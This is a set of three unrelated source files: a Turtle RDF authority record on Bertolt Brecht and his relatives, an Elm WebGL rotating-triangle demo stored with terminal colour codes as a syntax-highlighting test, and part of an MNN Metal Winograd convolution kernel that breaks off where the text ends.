gndo:professionOrOccupation <http://d-nb.info/gnd/4185053-1>, <http://d-nb.info/gnd/4140241-8>, <http://d-nb.info/gnd/4052154-0>, <http://d-nb.info/gnd/4168391-2>, <http://d-nb.info/gnd/4053309-8>, <http://d-nb.info/gnd/4049050-6>, <http://d-nb.info/gnd/4294338-3> ;
gndo:playedInstrument <http://d-nb.info/gnd/4057587-1> ;
gndo:gndSubjectCategory <http://d-nb.info/standards/vocab/gnd/gnd-sc#12.2p>, <http://d-nb.info/standards/vocab/gnd/gnd-sc#15.1p>, <http://d-nb.info/standards/vocab/gnd/gnd-sc#15.3p> ;
gndo:geographicAreaCode <http://d-nb.info/standards/vocab/gnd/geographic-area-code#XA-DE> ;
gndo:languageCode <http://id.loc.gov/vocabulary/iso639-2/ger> ;
gndo:placeOfBirth <http://d-nb.info/gnd/4003614-5> ;
gndo:placeOfDeath <http://d-nb.info/gnd/4005728-8> ;
gndo:placeOfExile <http://d-nb.info/gnd/4010877-6>, <http://d-nb.info/gnd/4077258-5> ;
gndo:gender <http://d-nb.info/standards/vocab/gnd/Gender#male> ;
gndo:dateOfBirth "1898-02-10"^^xsd:date ;
gndo:dateOfDeath "1956-08-14"^^xsd:date .
<http://d-nb.info/gnd/121608557> gndo:preferredNameForThePerson "Brecht, Berthold Friedrich" .
<http://d-nb.info/gnd/119056011> gndo:preferredNameForThePerson "Banholzer, Paula" .
<http://d-nb.info/gnd/118738348> gndo:preferredNameForThePerson "Neher, Carola" .
<http://d-nb.info/gnd/137070411> gndo:preferredNameForThePerson "Banholzer, Frank" .
<http://d-nb.info/gnd/118809849> gndo:preferredNameForThePerson "Berlau, Ruth" .
<http://d-nb.info/gnd/119027615> gndo:preferredNameForThePerson "Steffin, Margarete" .
<http://d-nb.info/gnd/118940163> gndo:preferredNameForThePerson "Zoff, Marianne" .
<http://d-nb.info/gnd/118630091> gndo:preferredNameForThePerson "Weigel, Helene" .
<http://d-nb.info/gnd/123783283> gndo:preferredNameForThePerson "Reichel, Käthe" .
<http://d-nb.info/gnd/118940155> gndo:preferredNameForThePerson "Hiob, Hanne" .
<http://d-nb.info/gnd/110005449> gndo:preferredNameForThePerson "Brecht, Stefan" .
<http://d-nb.info/gnd/13612495X> gndo:preferredNameForThePerson "Brecht-Schall, Barbara" .
<http://d-nb.info/gnd/123757398> gndo:preferredNameForThePerson "Schall, Ekkehard" .
<http://d-nb.info/gnd/1030496250> gndo:preferredNameForThePerson "Brezing, Joseph Friedrich" .
<http://d-nb.info/gnd/1030496366> gndo:preferredNameForThePerson "Brezing, Friederike" .
<http://d-nb.info/gnd/4185053-1> gndo:preferredNameForTheSubjectHeading "Theaterregisseur" .
<http://d-nb.info/gnd/4140241-8> gndo:preferredNameForTheSubjectHeading "Dramatiker" .
<http://d-nb.info/gnd/4052154-0> gndo:preferredNameForTheSubjectHeading "Schauspieler" .
<http://d-nb.info/gnd/4168391-2> gndo:preferredNameForTheSubjectHeading "Lyriker" .
<http://d-nb.info/gnd/4053309-8> gndo:preferredNameForTheSubjectHeading "Schriftsteller" .
<http://d-nb.info/gnd/4049050-6> gndo:preferredNameForTheSubjectHeading "Regisseur" .
<http://d-nb.info/gnd/4294338-3> gndo:preferredNameForTheSubjectHeading "Drehbuchautor" .
<http://d-nb.info/gnd/4003614-5> gndo:preferredNameForThePlaceOrGeographicName "Augsburg" .
<http://d-nb.info/gnd/4005728-8> gndo:preferredNameForThePlaceOrGeographicName "Berlin" .
<http://d-nb.info/gnd/4010877-6> gndo:preferredNameForThePlaceOrGeographicName "Dänemark" .
<http://d-nb.info/gnd/4077258-5> gndo:preferredNameForThePlaceOrGeographicName "Schweden" . | Turtle | 3 | JavascriptID/sourcerer-app | src/test/resources/samples/langs/Turtle/gnd-record.ttl | [
"MIT"
] |
[38;2;117;113;94m--[0m[38;2;117;113;94m elm install elm-explorations/linear-algebra[0m
[38;2;117;113;94m--[0m[38;2;117;113;94m elm install elm-explorations/webgl[0m
[38;2;249;38;114mimport[0m[38;2;248;248;242m [0m[38;2;248;248;242mBrowser[0m
[38;2;249;38;114mimport[0m[38;2;248;248;242m [0m[38;2;248;248;242mBrowser.Events[0m[38;2;248;248;242m [0m[38;2;249;38;114mas[0m[38;2;248;248;242m [0m[38;2;248;248;242mE[0m
[38;2;249;38;114mimport[0m[38;2;248;248;242m [0m[38;2;248;248;242mHtml[0m[38;2;248;248;242m [0m[38;2;249;38;114mexposing[0m[38;2;248;248;242m [0m[38;2;248;248;242m([0m[3;38;2;102;217;239mHtml[0m[38;2;248;248;242m)[0m
[38;2;249;38;114mimport[0m[38;2;248;248;242m [0m[38;2;248;248;242mHtml.Attributes[0m[38;2;248;248;242m [0m[38;2;249;38;114mexposing[0m[38;2;248;248;242m [0m[38;2;248;248;242m([0m[38;2;166;226;46mwidth[0m[38;2;248;248;242m,[0m[38;2;248;248;242m [0m[38;2;166;226;46mheight[0m[38;2;248;248;242m,[0m[38;2;248;248;242m [0m[38;2;166;226;46mstyle[0m[38;2;248;248;242m)[0m
[38;2;249;38;114mimport[0m[38;2;248;248;242m [0m[38;2;248;248;242mMath.Matrix4[0m[38;2;248;248;242m [0m[38;2;249;38;114mas[0m[38;2;248;248;242m [0m[38;2;248;248;242mMat4[0m[38;2;248;248;242m [0m[38;2;249;38;114mexposing[0m[38;2;248;248;242m [0m[38;2;248;248;242m([0m[3;38;2;102;217;239mMat4[0m[38;2;248;248;242m)[0m
[38;2;249;38;114mimport[0m[38;2;248;248;242m [0m[38;2;248;248;242mMath.Vector3[0m[38;2;248;248;242m [0m[38;2;249;38;114mas[0m[38;2;248;248;242m [0m[38;2;248;248;242mVec3[0m[38;2;248;248;242m [0m[38;2;249;38;114mexposing[0m[38;2;248;248;242m [0m[38;2;248;248;242m([0m[3;38;2;102;217;239mVec3[0m[38;2;248;248;242m,[0m[38;2;248;248;242m [0m[38;2;166;226;46mvec3[0m[38;2;248;248;242m)[0m
[38;2;249;38;114mimport[0m[38;2;248;248;242m [0m[38;2;248;248;242mWebGL[0m
[38;2;117;113;94m--[0m[38;2;117;113;94m MAIN[0m
[38;2;166;226;46mmain [0m[38;2;249;38;114m=[0m
[38;2;248;248;242m [0m[38;2;190;132;255mBrowser[0m[38;2;249;38;114m.[0m[38;2;248;248;242melement[0m
[38;2;248;248;242m [0m[38;2;102;217;239m{[0m[38;2;248;248;242m init [0m[38;2;249;38;114m=[0m[38;2;248;248;242m init[0m
[38;2;248;248;242m [0m[38;2;102;217;239m,[0m[38;2;248;248;242m view [0m[38;2;249;38;114m=[0m[38;2;248;248;242m view[0m
[38;2;248;248;242m [0m[38;2;102;217;239m,[0m[38;2;248;248;242m update [0m[38;2;249;38;114m=[0m[38;2;248;248;242m update[0m
[38;2;248;248;242m [0m[38;2;102;217;239m,[0m[38;2;248;248;242m subscriptions [0m[38;2;249;38;114m=[0m[38;2;248;248;242m subscriptions[0m
[38;2;248;248;242m [0m[38;2;102;217;239m}[0m
[38;2;117;113;94m--[0m[38;2;117;113;94m MODEL[0m
[38;2;249;38;114mtype alias [0m[38;2;166;226;46mModel[0m[38;2;248;248;242m [0m[38;2;249;38;114m=[0m
[38;2;248;248;242m [0m[38;2;190;132;255mFloat[0m
[38;2;166;226;46minit[0m[38;2;248;248;242m [0m[38;2;249;38;114m:[0m[38;2;248;248;242m [0m[38;2;102;217;239m()[0m[38;2;248;248;242m [0m[38;2;249;38;114m->[0m[38;2;248;248;242m ([0m[3;38;2;102;217;239mModel[0m[38;2;248;248;242m, [0m[3;38;2;102;217;239mCmd[0m[38;2;248;248;242m [0m[3;38;2;102;217;239mMsg[0m[38;2;248;248;242m)[0m
[38;2;166;226;46minit [0m[38;2;190;132;255m()[0m[38;2;248;248;242m [0m[38;2;249;38;114m=[0m
[38;2;248;248;242m [0m[38;2;249;38;114m([0m[38;2;248;248;242m [0m[38;2;190;132;255m0[0m[38;2;102;217;239m,[0m[38;2;248;248;242m [0m[38;2;190;132;255mCmd[0m[38;2;249;38;114m.[0m[38;2;248;248;242mnone [0m[38;2;249;38;114m)[0m
[38;2;117;113;94m--[0m[38;2;117;113;94m UPDATE[0m
[38;2;249;38;114mtype [0m[38;2;166;226;46mMsg[0m
[38;2;248;248;242m [0m[38;2;249;38;114m=[0m[38;2;248;248;242m [0m[38;2;190;132;255mTimeDelta[0m[38;2;248;248;242m [0m[38;2;190;132;255mFloat[0m
[38;2;166;226;46mupdate[0m[38;2;248;248;242m [0m[38;2;249;38;114m:[0m[38;2;248;248;242m [0m[3;38;2;102;217;239mMsg[0m[38;2;248;248;242m [0m[38;2;249;38;114m->[0m[38;2;248;248;242m [0m[3;38;2;102;217;239mModel[0m[38;2;248;248;242m [0m[38;2;249;38;114m->[0m[38;2;248;248;242m ([0m[3;38;2;102;217;239mModel[0m[38;2;248;248;242m, [0m[3;38;2;102;217;239mCmd[0m[38;2;248;248;242m [0m[3;38;2;102;217;239mMsg[0m[38;2;248;248;242m)[0m
[38;2;166;226;46mupdate [0m[38;2;248;248;242mmsg currentTime [0m[38;2;249;38;114m=[0m
[38;2;248;248;242m [0m[38;2;249;38;114mcase [0m[38;2;248;248;242mmsg [0m[38;2;249;38;114mof[0m
[38;2;248;248;242m [0m[38;2;190;132;255mTimeDelta[0m[38;2;248;248;242m delta [0m[38;2;249;38;114m->[0m
[38;2;248;248;242m [0m[38;2;249;38;114m([0m[38;2;248;248;242m delta [0m[38;2;249;38;114m+[0m[38;2;248;248;242m currentTime[0m[38;2;102;217;239m,[0m[38;2;248;248;242m [0m[38;2;190;132;255mCmd[0m[38;2;249;38;114m.[0m[38;2;248;248;242mnone [0m[38;2;249;38;114m)[0m
[38;2;117;113;94m--[0m[38;2;117;113;94m SUBSCRIPTIONS[0m
[38;2;166;226;46msubscriptions[0m[38;2;248;248;242m [0m[38;2;249;38;114m:[0m[38;2;248;248;242m [0m[3;38;2;102;217;239mModel[0m[38;2;248;248;242m [0m[38;2;249;38;114m->[0m[38;2;248;248;242m [0m[3;38;2;102;217;239mSub[0m[38;2;248;248;242m [0m[3;38;2;102;217;239mMsg[0m
[38;2;166;226;46msubscriptions [0m[38;2;248;248;242m_ [0m[38;2;249;38;114m=[0m
[38;2;248;248;242m [0m[38;2;190;132;255mE[0m[38;2;249;38;114m.[0m[38;2;248;248;242monAnimationFrameDelta [0m[38;2;190;132;255mTimeDelta[0m
[38;2;117;113;94m--[0m[38;2;117;113;94m VIEW[0m
[38;2;166;226;46mview[0m[38;2;248;248;242m [0m[38;2;249;38;114m:[0m[38;2;248;248;242m [0m[3;38;2;102;217;239mModel[0m[38;2;248;248;242m [0m[38;2;249;38;114m->[0m[38;2;248;248;242m [0m[3;38;2;102;217;239mHtml[0m[38;2;248;248;242m [0m[38;2;255;255;255mmsg[0m
[38;2;166;226;46mview [0m[38;2;248;248;242mt [0m[38;2;249;38;114m=[0m
[38;2;248;248;242m [0m[38;2;190;132;255mWebGL[0m[38;2;249;38;114m.[0m[38;2;248;248;242mtoHtml[0m
[38;2;248;248;242m [0m[38;2;102;217;239m[[0m[38;2;248;248;242m width [0m[38;2;190;132;255m400[0m[38;2;102;217;239m,[0m[38;2;248;248;242m height [0m[38;2;190;132;255m400[0m[38;2;102;217;239m,[0m[38;2;248;248;242m style [0m[38;2;230;219;116m"[0m[38;2;230;219;116mdisplay[0m[38;2;230;219;116m"[0m[38;2;248;248;242m [0m[38;2;230;219;116m"[0m[38;2;230;219;116mblock[0m[38;2;230;219;116m"[0m
[38;2;248;248;242m [0m[38;2;102;217;239m][0m
[38;2;248;248;242m [0m[38;2;102;217;239m[[0m[38;2;248;248;242m [0m[38;2;190;132;255mWebGL[0m[38;2;249;38;114m.[0m[38;2;248;248;242mentity vertexShader fragmentShader mesh [0m[38;2;102;217;239m{[0m[38;2;248;248;242m perspective [0m[38;2;249;38;114m=[0m[38;2;248;248;242m perspective [0m[38;2;249;38;114m([0m[38;2;248;248;242mt [0m[38;2;249;38;114m/[0m[38;2;248;248;242m [0m[38;2;190;132;255m1000[0m[38;2;249;38;114m)[0m[38;2;248;248;242m [0m[38;2;102;217;239m}[0m
[38;2;248;248;242m [0m[38;2;102;217;239m][0m
[38;2;166;226;46mperspective[0m[38;2;248;248;242m [0m[38;2;249;38;114m:[0m[38;2;248;248;242m [0m[3;38;2;102;217;239mFloat[0m[38;2;248;248;242m [0m[38;2;249;38;114m->[0m[38;2;248;248;242m [0m[3;38;2;102;217;239mMat4[0m
[38;2;166;226;46mperspective [0m[38;2;248;248;242mt [0m[38;2;249;38;114m=[0m
[38;2;248;248;242m [0m[38;2;190;132;255mMat4[0m[38;2;249;38;114m.[0m[38;2;248;248;242mmul[0m
[38;2;248;248;242m [0m[38;2;249;38;114m([0m[38;2;190;132;255mMat4[0m[38;2;249;38;114m.[0m[38;2;248;248;242mmakePerspective [0m[38;2;190;132;255m45[0m[38;2;248;248;242m [0m[38;2;190;132;255m1[0m[38;2;248;248;242m [0m[38;2;190;132;255m0.01[0m[38;2;248;248;242m [0m[38;2;190;132;255m100[0m[38;2;249;38;114m)[0m
[38;2;248;248;242m [0m[38;2;249;38;114m([0m[38;2;190;132;255mMat4[0m[38;2;249;38;114m.[0m[38;2;248;248;242mmakeLookAt [0m[38;2;249;38;114m([0m[38;2;248;248;242mvec3 [0m[38;2;249;38;114m([0m[38;2;190;132;255m4[0m[38;2;248;248;242m [0m[38;2;249;38;114m*[0m[38;2;248;248;242m cos t[0m[38;2;249;38;114m)[0m[38;2;248;248;242m [0m[38;2;190;132;255m0[0m[38;2;248;248;242m [0m[38;2;249;38;114m([0m[38;2;190;132;255m4[0m[38;2;248;248;242m [0m[38;2;249;38;114m*[0m[38;2;248;248;242m sin t[0m[38;2;249;38;114m)[0m[38;2;249;38;114m)[0m[38;2;248;248;242m [0m[38;2;249;38;114m([0m[38;2;248;248;242mvec3 [0m[38;2;190;132;255m0[0m[38;2;248;248;242m [0m[38;2;190;132;255m0[0m[38;2;248;248;242m [0m[38;2;190;132;255m0[0m[38;2;249;38;114m)[0m[38;2;248;248;242m [0m[38;2;249;38;114m([0m[38;2;248;248;242mvec3 [0m[38;2;190;132;255m0[0m[38;2;248;248;242m [0m[38;2;190;132;255m1[0m[38;2;248;248;242m [0m[38;2;190;132;255m0[0m[38;2;249;38;114m)[0m[38;2;249;38;114m)[0m
[38;2;117;113;94m--[0m[38;2;117;113;94m MESH[0m
[38;2;249;38;114mtype alias [0m[38;2;166;226;46mVertex[0m[38;2;248;248;242m [0m[38;2;249;38;114m=[0m
[38;2;248;248;242m [0m[38;2;102;217;239m{[0m[38;2;248;248;242m position [0m[38;2;249;38;114m:[0m[38;2;248;248;242m [0m[38;2;190;132;255mVec3[0m
[38;2;248;248;242m [0m[38;2;102;217;239m,[0m[38;2;248;248;242m color [0m[38;2;249;38;114m:[0m[38;2;248;248;242m [0m[38;2;190;132;255mVec3[0m
[38;2;248;248;242m [0m[38;2;102;217;239m}[0m
[38;2;166;226;46mmesh[0m[38;2;248;248;242m [0m[38;2;249;38;114m:[0m[38;2;248;248;242m [0m[3;38;2;102;217;239mWebGL[0m[38;2;248;248;242m.[0m[3;38;2;102;217;239mMesh[0m[38;2;248;248;242m [0m[3;38;2;102;217;239mVertex[0m
[38;2;166;226;46mmesh [0m[38;2;249;38;114m=[0m
[38;2;248;248;242m [0m[38;2;190;132;255mWebGL[0m[38;2;249;38;114m.[0m[38;2;248;248;242mtriangles[0m
[38;2;248;248;242m [0m[38;2;102;217;239m[[0m[38;2;248;248;242m [0m[38;2;249;38;114m([0m[38;2;248;248;242m [0m[38;2;190;132;255mVertex[0m[38;2;248;248;242m [0m[38;2;249;38;114m([0m[38;2;248;248;242mvec3 [0m[38;2;190;132;255m0[0m[38;2;248;248;242m [0m[38;2;190;132;255m0[0m[38;2;248;248;242m [0m[38;2;190;132;255m0[0m[38;2;249;38;114m)[0m[38;2;248;248;242m [0m[38;2;249;38;114m([0m[38;2;248;248;242mvec3 [0m[38;2;190;132;255m1[0m[38;2;248;248;242m [0m[38;2;190;132;255m0[0m[38;2;248;248;242m [0m[38;2;190;132;255m0[0m[38;2;249;38;114m)[0m
[38;2;248;248;242m [0m[38;2;102;217;239m,[0m[38;2;248;248;242m [0m[38;2;190;132;255mVertex[0m[38;2;248;248;242m [0m[38;2;249;38;114m([0m[38;2;248;248;242mvec3 [0m[38;2;190;132;255m1[0m[38;2;248;248;242m [0m[38;2;190;132;255m1[0m[38;2;248;248;242m [0m[38;2;190;132;255m0[0m[38;2;249;38;114m)[0m[38;2;248;248;242m [0m[38;2;249;38;114m([0m[38;2;248;248;242mvec3 [0m[38;2;190;132;255m0[0m[38;2;248;248;242m [0m[38;2;190;132;255m1[0m[38;2;248;248;242m [0m[38;2;190;132;255m0[0m[38;2;249;38;114m)[0m
[38;2;248;248;242m [0m[38;2;102;217;239m,[0m[38;2;248;248;242m [0m[38;2;190;132;255mVertex[0m[38;2;248;248;242m [0m[38;2;249;38;114m([0m[38;2;248;248;242mvec3 [0m[38;2;190;132;255m1[0m[38;2;248;248;242m [0m[38;2;249;38;114m-[0m[38;2;190;132;255m1[0m[38;2;248;248;242m [0m[38;2;190;132;255m0[0m[38;2;249;38;114m)[0m[38;2;248;248;242m [0m[38;2;249;38;114m([0m[38;2;248;248;242mvec3 [0m[38;2;190;132;255m0[0m[38;2;248;248;242m [0m[38;2;190;132;255m0[0m[38;2;248;248;242m [0m[38;2;190;132;255m1[0m[38;2;249;38;114m)[0m
[38;2;248;248;242m [0m[38;2;249;38;114m)[0m
[38;2;248;248;242m [0m[38;2;102;217;239m][0m
[38;2;117;113;94m--[0m[38;2;117;113;94m SHADERS[0m
[38;2;249;38;114mtype alias [0m[38;2;166;226;46mUniforms[0m[38;2;248;248;242m [0m[38;2;249;38;114m=[0m
[38;2;248;248;242m [0m[38;2;102;217;239m{[0m[38;2;248;248;242m perspective [0m[38;2;249;38;114m:[0m[38;2;248;248;242m [0m[38;2;190;132;255mMat4[0m
[38;2;248;248;242m [0m[38;2;102;217;239m}[0m
[38;2;166;226;46mvertexShader[0m[38;2;248;248;242m [0m[38;2;249;38;114m:[0m[38;2;248;248;242m [0m[3;38;2;102;217;239mWebGL[0m[38;2;248;248;242m.[0m[3;38;2;102;217;239mShader[0m[38;2;248;248;242m [0m[3;38;2;102;217;239mVertex[0m[38;2;248;248;242m [0m[3;38;2;102;217;239mUniforms[0m[38;2;248;248;242m { [0m[38;2;255;255;255mvcolor[0m[38;2;248;248;242m : [0m[3;38;2;102;217;239mVec3[0m[38;2;248;248;242m }[0m
[38;2;166;226;46mvertexShader [0m[38;2;249;38;114m=[0m
[38;2;248;248;242m [0m[38;2;249;38;114m[[0m[38;2;102;217;239mglsl[0m[38;2;249;38;114m|[0m
[38;2;166;226;46m [0m[38;2;249;38;114mattribute[0m[38;2;166;226;46m [0m[3;38;2;102;217;239mvec3[0m[38;2;166;226;46m position[0m[38;2;166;226;46m;[0m
[38;2;166;226;46m [0m[38;2;249;38;114mattribute[0m[38;2;166;226;46m [0m[3;38;2;102;217;239mvec3[0m[38;2;166;226;46m color[0m[38;2;166;226;46m;[0m
[38;2;166;226;46m [0m[38;2;249;38;114muniform[0m[38;2;166;226;46m [0m[3;38;2;102;217;239mmat4[0m[38;2;166;226;46m perspective[0m[38;2;166;226;46m;[0m
[38;2;166;226;46m [0m[38;2;249;38;114mvarying[0m[38;2;166;226;46m [0m[3;38;2;102;217;239mvec3[0m[38;2;166;226;46m vcolor[0m[38;2;166;226;46m;[0m
[38;2;166;226;46m [0m[3;38;2;102;217;239mvoid[0m[38;2;166;226;46m [0m[38;2;166;226;46mmain[0m[38;2;166;226;46m [0m[38;2;166;226;46m([0m[38;2;166;226;46m)[0m[38;2;166;226;46m [0m[38;2;166;226;46m{[0m
[38;2;166;226;46m [0m[38;2;255;255;255mgl_Position[0m[38;2;166;226;46m [0m[38;2;249;38;114m=[0m[38;2;166;226;46m perspective [0m[38;2;249;38;114m*[0m[38;2;166;226;46m [0m[3;38;2;102;217;239mvec4[0m[38;2;166;226;46m([0m[38;2;166;226;46mposition[0m[38;2;166;226;46m,[0m[38;2;166;226;46m [0m[38;2;190;132;255m1.0[0m[38;2;166;226;46m)[0m[38;2;166;226;46m;[0m
[38;2;166;226;46m vcolor [0m[38;2;249;38;114m=[0m[38;2;166;226;46m color[0m[38;2;166;226;46m;[0m
[38;2;166;226;46m [0m[38;2;166;226;46m}[0m
[38;2;166;226;46m [0m[38;2;249;38;114m|][0m
[38;2;166;226;46mfragmentShader[0m[38;2;248;248;242m [0m[38;2;249;38;114m:[0m[38;2;248;248;242m [0m[3;38;2;102;217;239mWebGL[0m[38;2;248;248;242m.[0m[3;38;2;102;217;239mShader[0m[38;2;248;248;242m {} [0m[3;38;2;102;217;239mUniforms[0m[38;2;248;248;242m { [0m[38;2;255;255;255mvcolor[0m[38;2;248;248;242m : [0m[3;38;2;102;217;239mVec3[0m[38;2;248;248;242m }[0m
[38;2;166;226;46mfragmentShader [0m[38;2;249;38;114m=[0m
[38;2;248;248;242m [0m[38;2;249;38;114m[[0m[38;2;102;217;239mglsl[0m[38;2;249;38;114m|[0m
[38;2;166;226;46m precision mediump [0m[3;38;2;102;217;239mfloat[0m[38;2;166;226;46m;[0m
[38;2;166;226;46m [0m[38;2;249;38;114mvarying[0m[38;2;166;226;46m [0m[3;38;2;102;217;239mvec3[0m[38;2;166;226;46m vcolor[0m[38;2;166;226;46m;[0m
[38;2;166;226;46m [0m[3;38;2;102;217;239mvoid[0m[38;2;166;226;46m [0m[38;2;166;226;46mmain[0m[38;2;166;226;46m [0m[38;2;166;226;46m([0m[38;2;166;226;46m)[0m[38;2;166;226;46m [0m[38;2;166;226;46m{[0m
[38;2;166;226;46m [0m[38;2;255;255;255mgl_FragColor[0m[38;2;166;226;46m [0m[38;2;249;38;114m=[0m[38;2;166;226;46m [0m[3;38;2;102;217;239mvec4[0m[38;2;166;226;46m([0m[38;2;166;226;46mvcolor[0m[38;2;166;226;46m,[0m[38;2;166;226;46m [0m[38;2;190;132;255m1.0[0m[38;2;166;226;46m)[0m[38;2;166;226;46m;[0m
[38;2;166;226;46m [0m[38;2;166;226;46m}[0m
[38;2;166;226;46m [0m[38;2;249;38;114m|][0m
| Elm | 5 | JesseVermeulen123/bat | tests/syntax-tests/highlighted/Elm/test.elm | [
"Apache-2.0",
"MIT"
] |
//
// MetalConvolutionWinograd.metal
// MNN
//
// Created by MNN on 2019/02/01.
// Copyright © 2018, Alibaba Group Holding Limited
//
#include <metal_stdlib>
#include "MetalConvolutionActivation.metal"
using namespace metal;
struct winograd_constants {
int4 input_shape;
int4 output_shape;
int pad_x;
int pad_y;
int unit_width;
int unit_height;
int unit;
conv_activation_type activation;
};
static inline ftype4 get_input(const device ftype4 *input, int x, int y, constant winograd_constants &cst) {
return x < cst.input_shape.x && y < cst.input_shape.y && x >= 0 && y >= 0 ? input[x + y * cst.input_shape.x] : 0;
}
kernel void winograd_transform_source2_5_1(const device ftype4 *in [[buffer(0)]],
device ftype4 *out [[buffer(1)]],
constant winograd_constants &cst [[buffer(2)]],
uint3 gid [[thread_position_in_grid]]) {
auto pos = int3(gid);
if (pos.x < cst.unit_width && pos.y < cst.unit_height) {
int ix = pos.x * cst.unit - cst.pad_x;
int iy = pos.y * cst.unit - cst.pad_y;
auto z_in = in + pos.z * cst.input_shape.x * cst.input_shape.y;
auto S00 = get_input(z_in, ix + 0, iy + 0, cst);
auto S10 = get_input(z_in, ix + 1, iy + 0, cst);
auto S20 = get_input(z_in, ix + 2, iy + 0, cst);
auto S30 = get_input(z_in, ix + 3, iy + 0, cst);
auto S40 = get_input(z_in, ix + 4, iy + 0, cst);
auto S50 = get_input(z_in, ix + 5, iy + 0, cst);
auto S01 = get_input(z_in, ix + 0, iy + 1, cst);
auto S11 = get_input(z_in, ix + 1, iy + 1, cst);
auto S21 = get_input(z_in, ix + 2, iy + 1, cst);
auto S31 = get_input(z_in, ix + 3, iy + 1, cst);
auto S41 = get_input(z_in, ix + 4, iy + 1, cst);
auto S51 = get_input(z_in, ix + 5, iy + 1, cst);
auto S02 = get_input(z_in, ix + 0, iy + 2, cst);
auto S12 = get_input(z_in, ix + 1, iy + 2, cst);
auto S22 = get_input(z_in, ix + 2, iy + 2, cst);
auto S32 = get_input(z_in, ix + 3, iy + 2, cst);
auto S42 = get_input(z_in, ix + 4, iy + 2, cst);
auto S52 = get_input(z_in, ix + 5, iy + 2, cst);
auto S03 = get_input(z_in, ix + 0, iy + 3, cst);
auto S13 = get_input(z_in, ix + 1, iy + 3, cst);
auto S23 = get_input(z_in, ix + 2, iy + 3, cst);
auto S33 = get_input(z_in, ix + 3, iy + 3, cst);
auto S43 = get_input(z_in, ix + 4, iy + 3, cst);
auto S53 = get_input(z_in, ix + 5, iy + 3, cst);
auto S04 = get_input(z_in, ix + 0, iy + 4, cst);
auto S14 = get_input(z_in, ix + 1, iy + 4, cst);
auto S24 = get_input(z_in, ix + 2, iy + 4, cst);
auto S34 = get_input(z_in, ix + 3, iy + 4, cst);
auto S44 = get_input(z_in, ix + 4, iy + 4, cst);
auto S54 = get_input(z_in, ix + 5, iy + 4, cst);
auto S05 = get_input(z_in, ix + 0, iy + 5, cst);
auto S15 = get_input(z_in, ix + 1, iy + 5, cst);
auto S25 = get_input(z_in, ix + 2, iy + 5, cst);
auto S35 = get_input(z_in, ix + 3, iy + 5, cst);
auto S45 = get_input(z_in, ix + 4, iy + 5, cst);
auto S55 = get_input(z_in, ix + 5, iy + 5, cst);
auto m00 = +S00 - 1.25 * S02 + 0.25 * S04;
auto m10 = +S10 - 1.25 * S12 + 0.25 * S14;
auto m20 = +S20 - 1.25 * S22 + 0.25 * S24;
auto m30 = +S30 - 1.25 * S32 + 0.25 * S34;
auto m40 = +S40 - 1.25 * S42 + 0.25 * S44;
auto m50 = +S50 - 1.25 * S52 + 0.25 * S54;
auto m01 = +0.666667 * S01 + 0.666667 * S02 - 0.166667 * S03 - 0.166667 * S04;
auto m11 = +0.666667 * S11 + 0.666667 * S12 - 0.166667 * S13 - 0.166667 * S14;
auto m21 = +0.666667 * S21 + 0.666667 * S22 - 0.166667 * S23 - 0.166667 * S24;
auto m31 = +0.666667 * S31 + 0.666667 * S32 - 0.166667 * S33 - 0.166667 * S34;
auto m41 = +0.666667 * S41 + 0.666667 * S42 - 0.166667 * S43 - 0.166667 * S44;
auto m51 = +0.666667 * S51 + 0.666667 * S52 - 0.166667 * S53 - 0.166667 * S54;
auto m02 = -0.666667 * S01 + 0.666667 * S02 + 0.166667 * S03 - 0.166667 * S04;
auto m12 = -0.666667 * S11 + 0.666667 * S12 + 0.166667 * S13 - 0.166667 * S14;
auto m22 = -0.666667 * S21 + 0.666667 * S22 + 0.166667 * S23 - 0.166667 * S24;
auto m32 = -0.666667 * S31 + 0.666667 * S32 + 0.166667 * S33 - 0.166667 * S34;
auto m42 = -0.666667 * S41 + 0.666667 * S42 + 0.166667 * S43 - 0.166667 * S44;
auto m52 = -0.666667 * S51 + 0.666667 * S52 + 0.166667 * S53 - 0.166667 * S54;
auto m03 = -0.0833333 * S01 - 0.0416667 * S02 + 0.0833333 * S03 + 0.0416667 * S04;
auto m13 = -0.0833333 * S11 - 0.0416667 * S12 + 0.0833333 * S13 + 0.0416667 * S14;
auto m23 = -0.0833333 * S21 - 0.0416667 * S22 + 0.0833333 * S23 + 0.0416667 * S24;
auto m33 = -0.0833333 * S31 - 0.0416667 * S32 + 0.0833333 * S33 + 0.0416667 * S34;
auto m43 = -0.0833333 * S41 - 0.0416667 * S42 + 0.0833333 * S43 + 0.0416667 * S44;
auto m53 = -0.0833333 * S51 - 0.0416667 * S52 + 0.0833333 * S53 + 0.0416667 * S54;
auto m04 = +0.0833333 * S01 - 0.0416667 * S02 - 0.0833333 * S03 + 0.0416667 * S04;
auto m14 = +0.0833333 * S11 - 0.0416667 * S12 - 0.0833333 * S13 + 0.0416667 * S14;
auto m24 = +0.0833333 * S21 - 0.0416667 * S22 - 0.0833333 * S23 + 0.0416667 * S24;
auto m34 = +0.0833333 * S31 - 0.0416667 * S32 - 0.0833333 * S33 + 0.0416667 * S34;
auto m44 = +0.0833333 * S41 - 0.0416667 * S42 - 0.0833333 * S43 + 0.0416667 * S44;
auto m54 = +0.0833333 * S51 - 0.0416667 * S52 - 0.0833333 * S53 + 0.0416667 * S54;
auto m05 = +4.0 * S01 - 5.0 * S03 + S05;
auto m15 = +4.0 * S11 - 5.0 * S13 + S15;
auto m25 = +4.0 * S21 - 5.0 * S23 + S25;
auto m35 = +4.0 * S31 - 5.0 * S33 + S35;
auto m45 = +4.0 * S41 - 5.0 * S43 + S45;
auto m55 = +4.0 * S51 - 5.0 * S53 + S55;
int dst_x_origin = pos.z;
int dst_y_origin = cst.unit_width * pos.y + pos.x;
int dst_y_stride = cst.input_shape.z * 4;
int dst_y = dst_y_origin / 4;
int dst_x = dst_y_origin % 4 + 4 * dst_x_origin;
int src_height = UP_DIV(cst.unit_width * cst.unit_height, 4);
int stride = src_height * dst_y_stride;
auto xy_out = out + dst_y * dst_y_stride + dst_x;
*xy_out = +m00 - 1.25 * m20 + 0.25 * m40;
xy_out += stride; *xy_out = +0.666667 * m10 + 0.666667 * m20 - 0.166667 * m30 - 0.166667 * m40;
xy_out += stride; *xy_out = -0.666667 * m10 + 0.666667 * m20 + 0.166667 * m30 - 0.166667 * m40;
xy_out += stride; *xy_out = -0.0833333 * m10 - 0.0416667 * m20 + 0.0833333 * m30 + 0.0416667 * m40;
xy_out += stride; *xy_out = +0.0833333 * m10 - 0.0416667 * m20 - 0.0833333 * m30 + 0.0416667 * m40;
xy_out += stride; *xy_out = +4.0 * m10 - 5.0 * m30 + m50;
